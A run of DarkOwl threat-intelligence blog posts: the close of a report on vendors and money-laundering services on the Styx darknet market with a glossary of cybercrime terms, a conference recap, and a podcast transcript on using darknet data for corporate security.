The vendor shop “Valera888” sells PII, such as national identification documents, on Styx market. Using DarkOwl Vision, this same vendor’s username was found on darknet carding sites, a popular darknet Russian hacking forum, and more darknet marketplaces dating back to 2019. Although the same username on Styx has been used across darknet marketplaces in the past there is no way to tell if the same person is behind those accounts. In the past they have been associated with selling CVVs and private software. The username could be connected to the same user since they seem to follow a pattern selling personal information, but this is unconfirmed.  

Figure 10: Mapping Valera 888 with information from DarkOwl Vision

“337 Diller” is a vendor on the trusted vendors page of Styx marketplace. This vendor offers lookup services.

Figure 11: Vendor Profile of 337 Diller on Styx Market; Source: Styx Market

There are two Telegram channels immediately associated with this vendor on Styx marketplace. Further research reveals other channels run by a vendor with the same name selling similar products on Telegram. One of the Styx-market associated channels advertises data for sale and recruitment posts. Purchases of the data posted on this site can be made through their linked Telegram bot channel. A support channel is also linked within this channel. The other channel consists of reviews of the vendor. 

Figure 12: 337 Diller selling services on Telegram; Source: DarkOwl Vision

Research from DarkOwl Vision indicates this vendor has been offering lookup services and fullz since at least 2021 both via Telegram and on popular darknet marketplaces and forums.  

Figure 13: Mapping 337 Diller using data from DarkOwl Vision

“Podorozhnik” sells drawing services as a vendor on Styx market where a user can get in touch with them via the chat feature offered on the site. In addition to their presence on Styx, they also offer their fake documents for sale via dedicated Telegram channels. Drawing services is a term used for forged documents and fake documents. “Podorozhnik” advertised their drawing services on the darknet site DarkMoney in 2021. No Telegram channels are linked directly on Styx market, but there are multiple public channels connected to ”Podorozhnik” on Telegram. For example, they have a Telegram channel dedicated to reviews. These show communication between customers and “Podorozhnik” of successful verifications. A Telegram channel advertising “Podorozhnik” claims they had over 900 positive reviews on a popular Russian Forum.

Figure 14: Mapping Prodorozhnik using data from DarkOwl Vision

As each of the three vendors researched appear to have been present on darknet forums and marketplaces for years before joining Styx, they are more likely to be sophisticated and legitimate vendors. Vendor reviews are an essential component to establishing trust on darknet marketplaces and reassuring potential buyers of the legitimacy of the vendor. Two of the three vendors have reviews readily available for potential buyers to evaluate. These include Telegram channels dedicated to reviews. These reviews point to trust in the vendor. They have also embraced using Telegram for selling products and services and as a support system for customers. Telegram continues to grow as a main avenue for buying and selling darknet-related goods. Some of the Telegram channels associated with Styx marketplace vendors were created as early as 2021, while others have been created within the last year.

Final Thoughts

The products sold on Styx marketplace are hacker and financial-crime oriented. The market caters to sophisticated cybercriminals. Vendors offer access to multiple online banking and e-commerce sites. Money laundering services are strict and only for those who can pay meet the dollar minimum. While money laundering is risky, therefore requiring a minimum for payments, vendors have been successful enough to continue offering the service. And despite the high price there appear to be customers who are willing to pay. Financial institutions and the banking sector will need to continue to be wary given the account identity authentication techniques available for sale on Styx market. These include NFC Bins (NFC is what allows for contactless payment on cards) and vendors offering to set up funnel accounts which can be used as a drop service to “drop” stolen financials. Much like cash out vendors, drop services are used for money laundering illegally earned funds. For now, Styx market will provide a valuable outlet for cybercrime on the darknet as cybercriminals go after the online components of banking and come up with new methods for money laundering.  

Subscribe to email to receive the latest research directly into your inbox every Thursday and don’t miss our next Darknet Marketplace Snapshot.

Table of Definitions

WordDefinition
2FA/SMS Bypass2FA is two-factor authentication and is used to help secure accounts. SMS text messages are a common way to use 2FA many times by using one-time codes. Cybercriminals can achieve SMS bypass by SIM swapping or intercepting networks.
Business Full Info/TaxBusiness full into consists of detailed PII that could be utilized by a cybercriminals to commit fraud or identity theft. Coupled with tax information, the bad actor would possibly be able to commit many forms of financial fraud such as fraudulent wire transfers.
Installs for stealersSome stealers are sold as pay-per-install services. A user can pay to download the malware and install it on compromised systems of their choice
Anti-detect browsersAnti-detect browsers can be used for privacy and anonymity online as they avoid detection from online web-tracking technologies.
Laundry ServicesLaundry services are money laundering services to “clean” cash received from illegal activities and get the cash into the legal banking system.
FB/Google LogsLogs are records of activity that take place on computer systems. Using a record of activity such as Facebook posts and Google searches, a bad actor could use this information for phishing texts, emails, and sophisticated social engineering campaigns.
Cashout Banks/ VCCVCC stands for virtual credit cards. Cashing out bank accounts and cashing out virtual credit cards can be used to steal funds or for money laundering.
Crypto-mixerCrypto-mixers are used for obfuscation. They mix the cryptocurrencies of many users together to obfuscate where money comes from and who it belongs to. The money is later withdrawn to new addresses belonging to each user.
Stealer ServicesStealer services are the stealer-as-a-service market. Actors offer their stealer malware for sale for a customer to essentially rent to then compromise and access a device on their own. This way a customer with very little technical know-how can have access to sophisticated stealer malware. These are aimed at less-sophisticated users.
BG/SSN/DOBBackground check, Social Security number, and Date of Birth. This information can be used for identity theft, fraud, and social engineering. 
RDPRDP, remote desktop protocol, is a Windows interface that allows users to connect with another computer or server over the internet. Bad actors will sometimes use open RDP ports to install their ransomware onto the victim’s system.
VDSVDS stands for Virtual Dedicated Server and is essentially leasing a dedicated server that the user controls completely because it is not shared with other customers. A VDS is the conglomerate of a server, its hardware, and the operating system run by a remote access component allowing the user to access their server over the internet.
VPSVPS is a Virtual Private Server, and they are used for web hosting. Nation-state actors are known to use these in attacks as a proxy or bridge between the real server and the target as well as other methods like hosting RDPs, VPN, and proxy gateways to hide the location of the command and control servers. They are used to hide locations so as hide from security systems on targeted devices and to obfuscate the true IP addresses and locations.

DarkOwl Strengthens European Presence at ISS World Europe

Written by DarkOwl Content Team on . Posted in Blog.

June 16, 2023

Last week, DarkOwl participated in ISS World Europe in Prague. ISS World Europe prides themselves on being “the world’s largest gathering of Regional Law Enforcement, Intelligence and Homeland Security Analysts, Telecoms as well as Financial Crime Investigators responsible for Cyber Crime Investigation, Electronic Surveillance and Intelligence Gathering.” ISS World events (DarkOwl will be at a couple more this year) focus on the latest in cyber tools and methodologies specifically for law enforcement, public safety, government and private sector intelligence communities. The first full day of ISS events is dedicated to training and in-depth sessions. Trainings and topics covered throughout the event include how to use cyber to combat drug trafficking, cyber money laundering, human trafficking, terrorism and other nefarious activity that occurs all across the internet.

Representing DarkOwl this year at ISS World Europe was one of DarkOwl’s dynamic duos, David Alley, CEO of DarkOwl FZE based in Dubai and, Ramesh Elaiyavalli, CTO of DarkOwl, based out of DarkOwl’s headquarters in Denver, CO.

The networking opportunities this year were unmatched. David expressed, “This was the best ISS Prague I have ever attended. The show continues to grow in importance.” Needless to say, the team looks forward to next year. In addition to networking with new prospects, David and Ramesh were able to meet with a number of current partners and customers, an opportunity which is invaluable to have roadmap conversations, gather feedback and catch up face-to-face. Throughout the event, top minds of the space share the latest technology, trends and thought leadership in the cyber community. Topics this year included the growth of Telegram, cryptocurrency de-anonymization, blockchains’ growing role in geopolitical conflict, policing Tor, info-stealer ecosystems, visual intelligence from IoT, AI, mobile tracking, and more.

Ramesh noted a common theme throughout attendees, conversations and presentations, “everyone is suffering from data fatigue – too much data and too little insights.” This emphasizes the importance of law enforcement’s need to invest in software and data solutions that deliver insights and makes data easily digestible. DarkOwl plays an important role in providing valuable data and threat intelligence to this market.

Due to the layer of anonymity it provides, the darknet is often a hub for illegal activity. However, investigating crime on the darknet and deep web poses technical challenges, including the fact that darknet sites are continually coming on and offline with pages vanishing from one minute to the next. The technology DarkOwl leverages to scrape and index hidden digital undergrounds are key to the mission of obtaining proactive situational awareness for protection of the nation’s security initiatives. DarkOwl Vision UI provides a user-friendly interface with powerful querying capabilities to search, monitor, and create alerts for critical information. DarkOwl Vision has been used to support local and federal police investigations, as well as work done in intelligence/fusion centers and federal agencies to uncover human trafficking, opioid selling, terrorism, security issues, and other illegal activity, making it the perfect tool for this audience to be able to dive into.

Live Demonstration of DarkOwl Vision: Darknet Intelligence Discovery and Collection

The first day of the event, before booths were open, David Alley was able to give a live presentation to attendees demonstrating DarkOwl Vision: Darknet Intelligence Discovery and Collection. The team is thrilled to share that the conference room was filled to the brim with standing room only. The goal of this session was to further educate the international intelligence community on how threat actors on the darknet are evolving in their use of new tools and methodologies.

Vision UI is the industry leading platform for analysts to simply, safely, and comprehensively search the largest commercially available source of darknet data. Vision provides a user friendly interface with powerful querying capabilities to search, monitor, and create alerts for critical information. You can read more about Vision UI here.

DarkOwl looks forward to continuing our global presence at ISS events, you can see where we will be next and request time to meet with us here.

Forecasting Cyber Threats

Written by DarkOwl Content Team on . Posted in Whitepapers.

June 13, 2023

The darknet contains data critical to understanding criminal behavior and security risk, and companies need an understanding of their exposure on the darknet to determine risk and take mitigating actions. 

This report outlines DarkOwl’s new metric based on email and credential volume to measure an organization’s exposure. We tested our metric against 237 public cyberattacks occurring in 2021 and 2022 and found our signal was elevated within the last four months prior to an attack for 74% of the organizations. 

To learn more how DarkSonar can inform threat modeling, third party risk management, cyber insurance, and potentially predict cyber threats, contact us.

Data and the Dark Web: What is it, where is it, and why should we care?

Written by DarkOwl Content Team on . Posted in Blog.

June 07, 2023

Alison Connolly Halland, DarkOwl’s CBO, and Andrew Bayers, Head of Threat Intel at Resilience, discuss the ways data is collected on the darknet and the tools protecting business information, on Building Cyber Resilience Podcast brought to you by Resilience.

What you’ll learn:

  • The ways tools like DarkOwl use threat intelligence to improve resilience.
  • The importance of having layers in your security strategy.
  • Action steps for using darknet information for good.

For those that would rather read the conversation, we have transcribed it below.

NOTE: Some content has been edited for length and clarity.

Alison: We searched for the organization’s email addresses that had been exposed. Those came up. There were plain text passwords associated with them for someone that was actually on the, on the call, which happens all the time. But the part that was embarrassing is their plane text password was not something you would want. My guess was they made it as a 17 year old teenage boy and hadn’t changed it yet.

Ann: Welcome to the Building Cyber Resilience Podcast by resilience. I’m Dr. Ann Irvine Chief Data Scientist and Vice President of Product Management.

Richard: And I’m Richard Seiersen, Chief Risk Officer.

Ann: That was DarkOwl’s Chief Business Officer, Allison Connolly Halland, at the top of the show sharing why it may be time to update your password if you haven’t changed it since high school. It’s because of her company’s innovations that her joke is just that and not a breach that destroyed a business.

Alison: We are essentially darknet experts. So what we do 24/7 is we pull content off of the darknet, we park it in our own database, and then we provide our clients who are companies, not individuals, access to that data. Where our expertise lies is in the act of the collection – collecting data off of the darknet is not an easy task. And then number two, in filtering it, sorting it, layering on all of the bells and whistles on top of it so that you could go into our database and type in your social security number, up is gonna hopefully pop nothing, but if it does, it would show you those pages on the darknet that we, DarkOwl, have discovered that has that number present.

Ann: Alison originally started out in finance but was intrigued by some of her consulting clients in the security space. She eventually took the leap and joined the DarkOwl team in Denver, Colorado.

Alison: I’ve been here 6 years and we’ve been through a bunch of iterations and it’s been a really fun company to grow with. There’s just so much happening in the cybersecurity landscape that it’s great. I love it.

Richard: Allison’s work on the front lines helping security professionals use data from the darknet to inform their day-to-day operations is a very specific niche asset to the cybersecurity industry. But it’s important to define exactly why your work is so critical.

Andrew: Why would the CISO at a company care about what happens on the dark web? They have a website on the surface web, they don’t operate on the dark web. But seeing what’s happening today and where the conversations are going, that can help in the prioritization of how you address vulnerabilities. So threat intelligence, I like to say, puts a lot of the why behind a lot of the security controls we and our partners recommend to companies.

Richard: That’s Andrew Beires, Head of Threat Intel at Resilience, before this role, however, he wore several hats.

Andrew: I started in film school in New York City working at HBO on Sopranos and Sex and the City. And 9-11 happened and I rushed to a Marine Corps recruiting station and shipped off to Paris Island where I went through bootcamp and the Marine Corps sent me to the Defense Language Institute where I learned Korean and Chinese Mandarin. And then I worked on behalf of the Department of Defense and Marine Corps at the National Security Agency for the majority of my adult life. And that’s how I got into the cybersecurity space. So most of my work prior to rejoining resilience was as a nation sponsored, advanced persistent threat actor collecting foreign intelligence against our nation’s and allied nations foreign adversaries. So yeah, that’s me.

Richard: Andrew is in the trenches at Resilience, using threat intelligence tools like DarkOwl to not only protect our company but also to achieve our mission – to help our clients stay ahead of the bad guys.

Andrew: You know an organization that wants to protect their posture and their critical business functions, looking at the darkweb for those types of threats is critical.

Ann: In this episode with Allison and Andrew, we explore both sides of the security workflow from learning how the data is collected and organized to why it is necessary for making business decisions both proactively and reactively. What is the dark net and why should we care about it? Why are layers so important to build into your cybersecurity strategy? Do you have to work in a basement and wear a black hoodie in order to access this information?

Richard: Alison and Andrew answer these questions and offer valuable action steps for how this underworld of information can be used for good and know, in case you are wondering, a basement office and black hoodie are not required unless that’s your style, of course, which is totally cool. Anyways, let’s get into it.

Alison: In some ways, people are overly confident on the darknet because they believe that given the lack of IP addresses and cookies and what not, remaining anonymous is kind of it’s defining feature so there is kinda some false sense of security there, that even if people are looking at that content, they can’t trace it back. The other thing I think is really funny, or I don’t know why it is funny because I was an econ major and I should know that all these market rules apply wether it is legal or illegal, is that the quest to be the best in the customer success department in the darknet is very much present. So there’s a lot of credit card forums, my favorite one says “we are here to serve our customers, we are the best! We ship overnight, free shipping, we are extremely reliable…” you know reading the verbiage just makes you laugh, because you think these are criminals, but like any business they are trying to win and maintain customers.

Ann: Same with ransomware gangs, right? They have entire customer success divisions.

Alison: Yup!

Andrew: Bad guys are in the business of business too, right?

Alison: Exactly.

Ann: Mm-hmm.

Richard: The darknet is an encrypted layer of the internet that cannot be found through regular search engines like Google. It is used mostly for illegal activities and is a breeding ground for data leaks. Laughs aside, the darknet is not a space you want to enter without proper preparation tools and support.

Alison: You know, you run the risk of potentially running into content you don’t want to see, visually, you also run the risk of ending up in maybe a marketplace or a forum and potentially exposing your own identity without knowing it. And I think the other one, the third one, which is the reason we, DarkOwl, is in business is it’s an extremely, extremely inefficient place to navigate. So if you think about the surface web, you go onto Google type in your search term, and there are all the results and we all trust that Google has gotten that right. That’s why they are who they are. The darknet is not structured in that way. So if you were to go onto Tor, which you can, that is not an illegal act in itself. It’s just very hard to navigate. There’s not nice clean URLs to find, there’s no pretty search engines or search bars, so you’re gonna burn a lot of time frankly.

Ann: While the anonymous factor that Alison highlighted earlier is certainly part of the draw to the darknet, it’s not entirely true. Leaders like DarkOwl are making the data more searchable to help companies identify specific actors on the darknet through graphing.

Alison: So I mean, part of it is us, as we collect all of this data and we’re indiscriminate in how we do that. And what I mean by that is we don’t look at, look at a page on the darknet and say, oh, this is outside of our industry – we’re not gonna grab it. We always grab it. And then once we do, the first thing we do is just tokenize everything that we see. Do we see social security number? Do we see an email address? Do we see a domain? Do we see an IP address? And obviously there’s tons of free text in between there, but we’re gonna tokenize as many items as we can, right? Is there an ampersand, like a threat actor name? And then once you’ve done that, like you said, it becomes really interesting when you can graphically represent the information, right? If you are a seller on a marketplace and we can connect you to a different seller that has a similar name that was, you start to play that game, which becomes really powerful in the investigation space. We are extremely strong on the identification of entities within the data. The graphing piece we are adamantly working on and have made some huge strides, but we haven’t, we definitely, if I’m being honest, we haven’t perfected that piece yet. And some of our clients actually use their own graphing abilities on top of our data.

Richard: So very interesting business model. And I’m just curious, maybe you can tell me about the type of clients you have and the threat intelligence groups and folks like that, that are in these organizations. I just have to assume their use cases are varied, but I’d like to hear more about that.

Alison: I like to bucket our clients into three groups. There’s one that people don’t often think of, that is where the majority of our clients sit. So number one, we do serve government and law enforcement. If you work for the DEA and you are in charge of tracking down folks selling fentanyl, you would wanna have access to the darknet where they’re actually doing that. And the DEA is not a client for the record, but that is one bucket of our clients – although the smallest.

Number 2 is large enough corporations where the risk of having their own organization exposed on the darknet is worth looking at this data set. So think Fortune 1000, you’re the CISO of Nike, and you wanna know, is someone targeting my executives? Is someone going after my IP address? Is someone talking about a ransomware attack or are my newest designs of my Nike shoes being sold. Counterfeiting is a big use case for us. So clients that have products that are being sold in counterfeit markets. So those are companies that are purchasing DarkOwl data and they’re looking at it for their own edification. That’s bucket number two.

And then interestingly, the biggest bucket of our clients are clients that are purchasing DarkOwl data, aggregating it and looking at it on behalf of their clients. So most of those folks sit in the cybersecurity industry. So it’s other cybersecurity companies that are, and we are essentially that darknet component. So I sort of like to think of it – you buy a Dell computer and it, you know, they used on the ad, they’d be like, powered by Intel and then it would make that little noise. So, it’s DarkOwl or their darknet is powered by DarkOwl. So, and that runs the gamut. They could be layering it on top of social media data. They could be just doing penetration testing and they’re using our data. They could be like you all in the cyber insurance space and they’re looking at DarkOwl across tons of potential companies. So that’s where the majority of our data and our clients reside is those that are looking at added on behalf of their clients.

Ann: At Resilience, this is how we utilize DarkOwl. Andrew Beires, Head of Threat Intel, is quick to point out that what he is looking for in his role falls right in between the bad activity happening on the darknet. And the good activity.

Andrew: You hear about the dark web and the news and really all the conversations you hear about it are about most of the bad things that are happening, right? So, you know, the illicit financing, the money laundering, the drug, narcotics sales, the gang activity, the criminal underbelly, sort of like place of communication. But there are actually a lot of good things going on where people in more oppressed nations who have, you know, a difficult time getting information out of their countries and sharing that with the world, that’s a great place to do that. There are journalists there, whistleblowers, there are people doing good on the dark web. So there’s good stuff too, if that’s what you meant by good. Now there’s a lot of juicy stuff that we care about, but none of it is good. None of that is good, right?

Richard: So the juicy stuff goes under the general rubric of threat intelligence. I always like asking people what is threat intelligence and how would I know it’s happening to me?

I always like asking people that question because the answer points to why we do what we do at resilience, Andrew highlights exactly how this plays out in his day-to-day workflow.

Andrew: You know, it’s like know your enemy, right? So knowing the people behind the keyboards that are attacking you, or have the potential to attack you, what their behaviors are. Like, what are the types of malware that people are purchasing? What are the trending vulnerabilities that are being discussed? So we had pretty strict criteria about the things that we want to engage directly with our customers about, and it has to meet three pieces of criteria. One, the vulnerability, so we are consistently evaluating the posture of our book of business. And so, and that’s company by company. And with the help of a lot of great people in engineering and data science, we are able to do this on a regular basis that a lot of it is automated. And so for us, when we see a company that, let’s say we, we see a vulnerability that is associated with some asset that they have exposed to the internet.

So first, is it remotely accessible. Like is it exposed to the internet or is this some local vulnerability that there would be a sort of a higher bar of entry in order to get to that asset. So those aren’t those types of things we wouldn’t really see from what we do. So it has to be remotely accessible. So remotely exploitable, right? It has to be our customers. So, you know, not a CVSS score, right, of critical. It doesn’t necessarily have to be a critical vulnerability, but if it becomes a critical vulnerability to us, if we know attackers are exploiting it actively in the wild or a proof of concept has been released on how to exploit that vulnerability. The third piece is there is actionable mitigation or remediation measures that have either been released by the vendor or a security researcher or somebody. So there is a specific action that the customer can take to mitigate or remediate. And then when we identify those, so it meets those criteria, we engage directly with the customer to notify them and help them through the process of remediation.

Richard: One follow on to that. So one vector of course is the remote. But many bad guys these days, particularly ransomware, they’re attacking what we call layer A, the human right? So be it spear phishing or phishing in general, or you think about business email compromise, all these other vectors. What’s the bridge between that threat intelligence and how you work with your customers?

Andrew: Sure, the dark web is a great place to hunt for potential insider threats. And that doesn’t necessarily mean it has to be a malicious insider. Maybe it’s a negligent or unintentional error on the part of an insider that led to something like their credentials being exposed. Maybe it’s something through their own personal life that was exposed and then somehow that is, you know, associated to it enabling some sort of access to that organization. So another piece on the malicious sort of insider that the dark web is the place where people sell access to threat actors. So it is also the place where threat actors advertise paying for access to specific things like, “hey, do you work for this type of company? If so, and you have access, we would like to buy that from you.”

Ann: Wow, that’s terrifying to think about people sort of selling their access as an employee of an organization. A comparable thing happens, of course, and working with any nation state for espionage. But how often is that really happening? Is that happening frequently?

Andrew: Every day. And it’s on the rise, I would say like more in 2022 than in 2021. And I mean, the expectation is more in 2023. So our CISO loves to make this joking comment and I find it funny, but it is scary. Like you said, it’s terrifying, right? We’re all just one bad day away from being that threat actor selling access.

Ann: Yeah. In a way, I kind of hate talking about this in a public venue like this podcast, you know, I don’t wanna advertise that this is a thing… hey, go to the dark web and you can make a quick buck with your corporate credentials. But sounds like that could be the case.

Richard: I’m just endlessly fascinated with the area of threat intelligence because the possibilities in terms of the size of data and the types of questions that can be asked are endless. Obviously you’ve made it clear that one of the most plausible places to look for badness is the dark web as if that really constrains the search surface, for information. How is it that you go about getting at actionable information? You mentioned a little bit about data science and other forms of magic and mysticism, but maybe you can unravel that a little bit for our listeners. Like how does that actually work out? Because the reality is the dark web, it’s a big mysterious place, right? So how do you do it?

Andrew: We have relationships with intelligence providers both in the private sector and in the government. So, you know, this may be story time. So we’ve got alerts set up. If there are specific keywords maybe mentioned, so I’m not having to read, our teams and having to read every chat in every forum across the entire internet. But we obviously care about the insurance industry a lot. There is a threat actor selling access and you know, of course they will anonymize it, right? Not give the keys to the kingdom in the advertisement. So the company was not named, but it was an insurance company, global insurance company. And what was given was the zip code. So just piecing that together and working with one of our co-founders, we were able to figure out exactly which company that was.

And for us on the security side, we are what we consider white hats. So there’s this ethical responsibility, a very focused moral compass. So we did what we considered the right thing, which is to contact this insurance company and let them know that this was going on. And it was through scouring LinkedIn to find, just doing a little open source intelligence like who works at this company in security and would even begin to understand like why I’m trying to message them. And so we were able to get in contact with ’em, this was a Sunday afternoon and it went until maybe 11 at night and they were incredibly thankful. So that was a success story. Maybe we were able to prevent an attack and sort of shut that down before it led to an extortion event.

Richard: That’s awesome.

Ann: Andrew’s insight shows how these tools are used at a firm like Resilience to stop an attack in its tracks. Allison provides two more examples of real world use cases from a more proactive perspective.

Alison: So there’s absolutely a way to look at this data set and sort of get ahead of it. And I think, you know, the most simple example would be, let’s say you’re an organization and all of a sudden next Tuesday you see that 200 of your employees email addresses are part of a, a breach or a compilation or someone, someone says on a forum, “I have 200 email addresses and plain text passwords associated with this company.” And oftentimes they’ll actually put those up as kind of proof of life. And you know, the use case there, Rich, is what are the, if you can get that sample, which we at DarkOwl would pull down and would be in our database, then it becomes a much easier reconnaissance game of instead of just saying, oh my goodness, we have content on the darknet – I don’t know what it is, I don’t know what to do about it, I don’t know how it got there. If you can pull down those email addresses and say, wow, it turns out all 200 of these employees started on September 1st, or all 200 of these employees attended a conference in Florida two months ago, or all 200 of these employees are no longer with the company. Those are three totally different incident responses. You know, one of ’em you don’t even have to deal with, right? One of ’em is, let’s go to our HR platform, why are they, they were all onboarded, but it gives you the context to then figure out what the problem is rather than waiting for it to show up on the front page of the Wall Street Journal that your organization has been subject to XYZ.

So I think the context can provide that proactive piece and allow companies to understand and especially that definitely follows suit in regards to some of it’s more, you mentioned qualitative versus quantitative. Some folks are just looking at it for, in sort of the way you look at Glassdoor content, right? What are people saying about our company? Is there a negative talk about it or you know, is it notorious for easy to break into? I mean there’s a lot that you can gather from sort of the sentiment about how people talk about organizations that can be telling too, for an organization. We do have a sector of, and this is more recent, but it’s growing quickly of clients who are in the TPR, third party risk platform or management, where they’re looking at, think if you’re a huge organization and you’re considering all these different vendors as you kind of want to know how risky is that, do I have some that are, have a great deal of exposure on the dark net would be an a leading indicator that they may not be as buttoned up as you think.

And then that same sort of use case translates really well to the M&A [mergers and acquisitions] space. So we have folks that are looking at the data in regards to potential mergers or acquisitions saying, you know, is this a company I wanna purchase or emerge? Or they get a sense for what their hygiene is in some ways.

Ann: I have one kind of funny question. Sometimes when I find myself in the DarkOwl UI, as I said, I search for myself, the next thing I do is just sort of look at people’s, pick a company that I care about. You know, I’ll just kind of browse plain text passwords. I find them endlessly entertaining to just read like a novel. Do you have any interesting or funny anecdotes about just like, things that you’ve read or seen or been entertained by in this data?

Alison: Yes, absolutely. So, you know, obviously we do a lot of demos of our platform for potential customers and we almost always search for their organization in front of them and show them what content we have. And we have had, I think I’ve been in the room for two, one of ’em was in person, one of ’em was on the phone, but two demos that were extremely embarrassing. And what I mean by that, Ann, is we searched for the organization’s email addresses that had been exposed. Those came up, there were plain text passwords associated with them for someone that was actually on the call and which happens all the time. But the part that was embarrassing is their plain text password was not something you would want.

Ann: Didn’t read it aloud?

Alison: Yeah, no, we did not it out loud.

Ann: Amazing.

Alison: My guess was they made it as a 17 year old teenage boy and hadn’t changed it yet. So…

Ann: Or that’s what they still are on the inside.

Alison: I’ll Leave it at that. So we’ve had some interesting passwords, but yeah, I agree with you. I also read through plain text passwords like a novel. I find it fascinating.

Richard: Embarrassing passwords aside. These examples show how having access to this data allows your organization to be proactive. As Alison highlighted, organizations are using it to hedge their bets on mergers and acquisitions. Another emerging use is occurring in the insurance underwriting space.

Alison: I think we’re kind of at stage one, right? If I was someone underwriting policies for a company, I would just want to know that baseline, like what does that presence look like on the darknet? And I think where we can head, which would be a really neat space to be in, is can we look at that data and then incentivize that company to better their practices, to lower the risk, lower the policy. You know, I think there’s, that’s kind of the proactive piece that I think would be, that we’re headed towards. And there’s obviously a lot of work to be done, but the data can be informative and I think you guys are doing a really nice job at using it.

Richard: Actually, that’s a great opportunity for me to ask Ann a question about how we use your data in our models. Yeah, I’m actually very curious. And you know what, I bet you other people are too.

Ann: Yeah, I mean we use it for underwriting. So we collect data and we look at the results, our models consider the results with exactly what you said Alison, the sort of understanding that the goal is that organizations are not the worst among their peer group.

As I shared, Resilience uses DarkOwl for everything from defensive measures to proactive underwriting insight. Now every business will use this information differently depending on your unique goals, but the key is to use it to your advantage. How do you make sure your company is taking the optimal steps towards cyber resilience? Andrew has some advice.

Andrew: It’s like trying to align your sort of cyber risk with your critical business functions and how those align and if it makes sense financially. To try to build a capability in-house, that is one way, right? But there are also businesses built, that have been members of the intelligence community previously or black hat types previously that do this every day. And so paying for that as a service is another, is another option. But there is no doubt that insight to what is going on on a lot of these forms. And then sort of back to your question as well, Dr. Ann, a lot of the groups that exist, they have very specific requirements in order for you to be let in the room really, right? So sometimes it could be proven track record of successful attacks.

So those are ways they are trying to evade obviously being on these more accessible forums. But back to your question, Rich, there are companies that are built for this. So whether or not it’s better to build an in-house capability or pay for that as a service, either way there are so many reasons why you want to know what’s going on. One, you know, is your company being targeted right now today? Do any of your credentials show up in data dumps? How do I prioritize like patching vulnerabilities? Not saying the only factor to consider is what’s being talked about, what is trending on the dark web, but that is a factor.

Richard: So let me and Ann, I have to drill in here cuz it’s like on this path of operationalizing this stuff, you know, there was the Lockheed Martin kill chain and that was fun to say, I like saying kill chain, but now there’s mitre attack, right? And you know, you have all the STIX and TAXII and you know, the idea that, log aggregators or a scene, whatever you like are now and soar are being able to consume in theory this data and you have data sharing and all that stuff with the intent. I think the belief as a buyer, this is as a consumer, as a CSO, the idea is, hey, you can scale out this sort of stuff without having to have an Andrew and you can make it actionable. That rests uneasy with me. This is maybe just to my own bias, maybe you can tell me a, what sort of value do you get out of like mitre attack, STIX and TAXII? How have you seen that get operationalized in the seam space or log aggregation space? What are your, again, getting back to the CSO or security person listening and thinking about how do I do this and what do I need to look out for? I know that was a big question, but there you go.

Andrew: Sure. So I would say, you know, specifically there is value in like the STIXs of the TAXIIs, right? So any specific indicator of compromise. That anything that I could ingest and automatically be able to detect or flag something specific that is known to be used by a threat actor, that’s great. Like how it all, so how you prioritize what to do first. Like that I think is where the human element comes in. Whether it’s from an incident response perspective or whether it’s trying to, for instance, stop an attack during the reconnaissance phase, like you mentioned the kill chain, so before initial access. Some of our partnerships enable us to have alerting from the intelligence community where they are sitting on the internet and they may see something like a staging sort of operation or preparations like planning being conducted to potentially target a company and then being able to alert that company. Like there’s such a human element to it. I don’t ever see the entire process being completely automated away. I mean that would be sign me up, I’ll find a nice warm beach to sit on.

Richard: Andrew’s point about humans being inseparable and paramount to this entire process, no matter how many autonomous upgrades and AI insights we add to it is key. To illustrate how these layers of security create a strategy that works. I shared a recent story that caught my attention.

There’s an NFT loss where the, where it was guy who’s the CEO of one of these NFT processor, he had his wallet or something hacked into, he lost millions of dollars of NFT value, but he said it didn’t impact his company. Cause they have, they have multi-factor authorization. So I was just thinking about this is the practical thing when we think about customers, like if we start seeing like there’s this campaign for business email compromise, it’s associated this, we see it that it’s a long term drain by thousands of cuts, but these are the practical things that you can do as opposed to just patching, here’s some business process you can put in place. Here’s some other things you can put in place that will, you know, that yes, it’s very shift, right? But could be remedial or really impact reduction. Cause we always get so focused on what can we do that’s innovative from a technical perspective that’s important, but there’s this whole other side of responding to actual loss.

Andrew: It does seem that with novel techniques for attacking, right? Often it comes back to the same control. If implemented correctly could prevent it.

Richard: Yeah, it could be hugely preventative. Yes, we can put great in-line controls in place. Yes, we can put great endpoint, yes, we can do great training, that’s good, but are there things that we can do that in theory can potentially mitigate this becomes harder in large organizations. Like how many people actually are able to move money around? Do you even know? And that’s, that becomes part of an attack service, right? So that’s interesting too.

Andrew: Defense in depth – like all the different layers. It’s more than just training your folks not to click on suspicious emails. Well there’s that, but then there’s also all of these like email filtering processes you can implement as well. Not one thing is gonna be the answer, but layering. I guess I’m explaining defense in depth now too. So I think that’s the answer.

Richard: I think this is a really great, like these sorts of things that people can practically do to protect themselves coming from someone like you is just so useful. All right, Anne, ask your closing question. You’ve been so good, Andrew, you’re awesome.

Ann: Last question. At Resilience, we talk a lot about what makes a company cyber resilient. I’m curious how you would answer that question.

Andrew: So a layered approach to security. It’s not one thing, it’s a lot of layers. So for instance, in business email compromise, we were talking about how training employees to not click on suspicious links or don’t click on ads that are being served up on your real estate. If you’re on an intermediary service provider like you two, right? So it’s not about always necessarily having the highest castle walls and the moat and the drawbridge and everything, but it’s like what makes a company cyber resilient is that, you know, that you might get infiltrated, so to speak, and how can you then quickly quarantine that, get them out. So yeah, a layered approach. Defense in depth. There’s critical security controls that you just have to be a part of every organization. So, you know, it takes a village.

Ann: Alison echoes Andrew’s sentiment by acknowledging the reality that you will be attacked. Having this level of humility is essential, but how you arm yourself and stay vigilant is what will determine your success.

Alison: I think anyone who thinks they have it all figured out and are all buttoned up are the most susceptible. I think we can only strive to be better than someone behind us. I mean, the analogy I like to use is, if you’re in the woods and you run into a bear, you don’t need to outrun the bear. You just need to outrun the other person with you, right? And I think in the cyber resilience space, you don’t wanna be at the bottom of the barrel because that’s the easy pickings. And if you think you’re the best, you’re probably not. There’s always holes. So I think, staying humble and making sure that you’re doing everything you can. I guess that would be my answer.

Ann: Yeah. Awesome.

Richard: So we often talk about the need for more visibility. We’ve got a lot of telemetry on the security tools that we own. It could be scanning, it could be from penetration testing, it could be from security information event management. It could be from your insurance policies and questionnaires. Adding dark web adds a lot more information about an area of extreme uncertainty. And if we get information from there about an actual attack on a specific company or perhaps even a person and or a whole segment, we’ve just really up-leveled our ability to respond. This is why having really great context, context that’s connected across the stuff that you know empirically and the stuff you know, as possibilities and bringing that information to bear with risk transfer is so key and why it’s such a key part of what we do at Resilience.

